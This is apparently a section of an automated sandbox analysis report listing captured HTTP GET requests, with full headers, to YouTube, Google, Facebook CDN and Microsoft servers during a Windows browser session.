Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=1276808726&ei=9nyVfNuwJQhImLBWGYdBz7R&ip=76.47.67.35&id=o-AFksPcCzJbiGZ1jyrXUegcxh0K4FMEpeMy2Hs4rFdLzwJ&itag=18&source=youtube&requiressl=yes&mh=X6&mm=019%2C34071%2C00380&mn=bIPmn%2CqvD9y%2CGpLvF&ms=bIPmn%2CqvD9y%2CGpLvF&mv=T&mvi=1&pl=42&initcwndbps=0257952&siu=1&spc=lxTUopluM1LZuOIeSd_Sv73UxNcmmmSR2qod-Ir8pTCq&vprv=1&svpuc=1&mime=video%2Fmp4&ns=oguUGnTIdn7uLprvgJUuhevL&cnr=42&ratebypass=yes&dur=08771689&lmt=3415632071704059&mt=1276808726&fvip=3&c=WEB&txp=0257952&n=fuFJ6yTc9JdFvTRB&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=tlrYzYlHnmdVLPCxqr0wgcuQ-GeYXue_lUdWXe56O9RBJ2hWq5wpJ5oIZipiNPZsQN46ubCHXRGW2XOHxKaenwU45tH1a__tzSn92KvyF9Kf&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=tlrYzYlHnmdVLPCxqr0wgcuQ-GeYXue_lUdWXe56O9RBJ2hWq5wpJ5oIZipiNPZsQN46ubCHXRGW2XOHxKaenwU45tH1a__tzSn92KvyF9Kf HTTP/1.1Host: rr1---sn-q4flrne6.googlevideo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.youtube.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/y1/l/0,cross/kEvgWhOAxWd.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yl/l/0,cross/gir1JteLu-6.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yN/l/0,cross/z8iN9p2rYBG.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=1276808726&ei=9nyVfNuwJQhImLBWGYdBz7R&ip=76.47.67.35&id=o-AFksPcCzJbiGZ1jyrXUegcxh0K4FMEpeMy2Hs4rFdLzwJ&itag=18&source=youtube&requiressl=yes&mh=X6&mm=019%2C34071%2C00380&mn=bIPmn%2CqvD9y%2CGpLvF&ms=bIPmn%2CqvD9y%2CGpLvF&mv=T&mvi=1&pl=42&ctier=L&initcwndbps=0257952&siu=1&spc=lxTUopluM1LZuOIeSd_Sv73UxNcmmmSR2qod-Ir8pTCq&vprv=1&svpuc=1&mime=video%2Fmp4&ns=oguUGnTIdn7uLprvgJUuhevL&cnr=42&ratebypass=yes&dur=08771689&lmt=3415632071704059&mt=1276808726&fvip=3&c=WEB&txp=0257952&n=fuFJ6yTc9JdFvTRB&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=tlrYzYlHnmdVLPCxqr0wgcuQ-GeYXue_lUdWXe56O9RBJ2hWq5wpJ5oIZipiNPZsQN46ubCHXRGW2XOHxKaenwU45tH1a__tzSn92KvyF9Kf&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=tlrYzYlHnmdVLPCxqr0wgcuQ-GeYXue_lUdWXe56O9RBJ2hWq5wpJ5oIZipiNPZsQN46ubCHXRGW2XOHxKaenwU45tH1a__tzSn92KvyF9Kf HTTP/1.1Host: rr1---sn-q4flrne6.googlevideo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.youtube.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=1276808726&ei=9nyVfNuwJQhImLBWGYdBz7R&ip=76.47.67.35&id=o-AFksPcCzJbiGZ1jyrXUegcxh0K4FMEpeMy2Hs4rFdLzwJ&itag=18&source=youtube&requiressl=yes&mh=X6&mm=019%2C34071%2C00380&mn=bIPmn%2CqvD9y%2CGpLvF&ms=bIPmn%2CqvD9y%2CGpLvF&mv=T&mvi=1&pl=42&initcwndbps=0257952&siu=1&spc=lxTUopluM1LZuOIeSd_Sv73UxNcmmmSR2qod-Ir8pTCq&vprv=1&svpuc=1&mime=video%2Fmp4&ns=oguUGnTIdn7uLprvgJUuhevL&cnr=42&ratebypass=yes&dur=08771689&lmt=3415632071704059&mt=1276808726&fvip=3&c=WEB&txp=0257952&n=fuFJ6yTc9JdFvTRB&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=tlrYzYlHnmdVLPCxqr0wgcuQ-GeYXue_lUdWXe56O9RBJ2hWq5wpJ5oIZipiNPZsQN46ubCHXRGW2XOHxKaenwU45tH1a__tzSn92KvyF9Kf&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=tlrYzYlHnmdVLPCxqr0wgcuQ-GeYXue_lUdWXe56O9RBJ2hWq5wpJ5oIZipiNPZsQN46ubCHXRGW2XOHxKaenwU45tH1a__tzSn92KvyF9Kf HTTP/1.1Host: rr1---sn-q4flrne6.googlevideo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.youtube.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=1276808726&ei=9nyVfNuwJQhImLBWGYdBz7R&ip=76.47.67.35&id=o-AFksPcCzJbiGZ1jyrXUegcxh0K4FMEpeMy2Hs4rFdLzwJ&itag=18&source=youtube&requiressl=yes&mh=X6&mm=019%2C34071%2C00380&mn=bIPmn%2CqvD9y%2CGpLvF&ms=bIPmn%2CqvD9y%2CGpLvF&mv=T&mvi=1&pl=42&ctier=L&initcwndbps=0257952&siu=1&spc=lxTUopluM1LZuOIeSd_Sv73UxNcmmmSR2qod-Ir8pTCq&vprv=1&svpuc=1&mime=video%2Fmp4&ns=oguUGnTIdn7uLprvgJUuhevL&cnr=42&ratebypass=yes&dur=08771689&lmt=3415632071704059&mt=1276808726&fvip=3&c=WEB&txp=0257952&n=fuFJ6yTc9JdFvTRB&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=tlrYzYlHnmdVLPCxqr0wgcuQ-GeYXue_lUdWXe56O9RBJ2hWq5wpJ5oIZipiNPZsQN46ubCHXRGW2XOHxKaenwU45tH1a__tzSn92KvyF9Kf&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=tlrYzYlHnmdVLPCxqr0wgcuQ-GeYXue_lUdWXe56O9RBJ2hWq5wpJ5oIZipiNPZsQN46ubCHXRGW2XOHxKaenwU45tH1a__tzSn92KvyF9Kf HTTP/1.1Host: rr1---sn-q4flrne6.googlevideo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.youtube.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=1276808726&ei=9nyVfNuwJQhImLBWGYdBz7R&ip=76.47.67.35&id=o-AFksPcCzJbiGZ1jyrXUegcxh0K4FMEpeMy2Hs4rFdLzwJ&itag=18&source=youtube&requiressl=yes&mh=X6&mm=019%2C34071%2C00380&mn=bIPmn%2CqvD9y%2CGpLvF&ms=bIPmn%2CqvD9y%2CGpLvF&mv=T&mvi=1&pl=42&initcwndbps=0257952&siu=1&spc=lxTUopluM1LZuOIeSd_Sv73UxNcmmmSR2qod-Ir8pTCq&vprv=1&svpuc=1&mime=video%2Fmp4&ns=oguUGnTIdn7uLprvgJUuhevL&cnr=42&ratebypass=yes&dur=08771689&lmt=3415632071704059&mt=1276808726&fvip=3&c=WEB&txp=0257952&n=fuFJ6yTc9JdFvTRB&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=tlrYzYlHnmdVLPCxqr0wgcuQ-GeYXue_lUdWXe56O9RBJ2hWq5wpJ5oIZipiNPZsQN46ubCHXRGW2XOHxKaenwU45tH1a__tzSn92KvyF9Kf&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=tlrYzYlHnmdVLPCxqr0wgcuQ-GeYXue_lUdWXe56O9RBJ2hWq5wpJ5oIZipiNPZsQN46ubCHXRGW2XOHxKaenwU45tH1a__tzSn92KvyF9Kf HTTP/1.1Host: rr1---sn-q4flrne6.googlevideo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.youtube.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /generate_204 HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/cssbin/www-main-desktop-home-page-skeleton.css HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/cssbin/www-onepick.css HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.fLWlFbBZ5xY.L.B1.O/am=ABAK/d=0/rs=AGKMywHhXrldChEf48bT3v0YjuAtI5m7dg HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/cssbin/www-main-desktop-watch-page-skeleton.css HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /js/th/QaMcj-JulTnv9WX-ZKiswnw1NZ6KstGU-WkCl6294a4.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/webcomponents-sd.vflset/webcomponents-sd.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: youtube.comConnection: keep-alivePragma: no-cacheCache-Control: no-cachesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.youtube.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/y1/l/0,cross/ZMAH_LE0voZ.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yJ/l/0,cross/jLYph3aQmdp.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yy/r/E23g9b-s4oe.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/y1/r/4lCu2zih0ca.svg HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yE/r/xGzxHIbkRpC.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
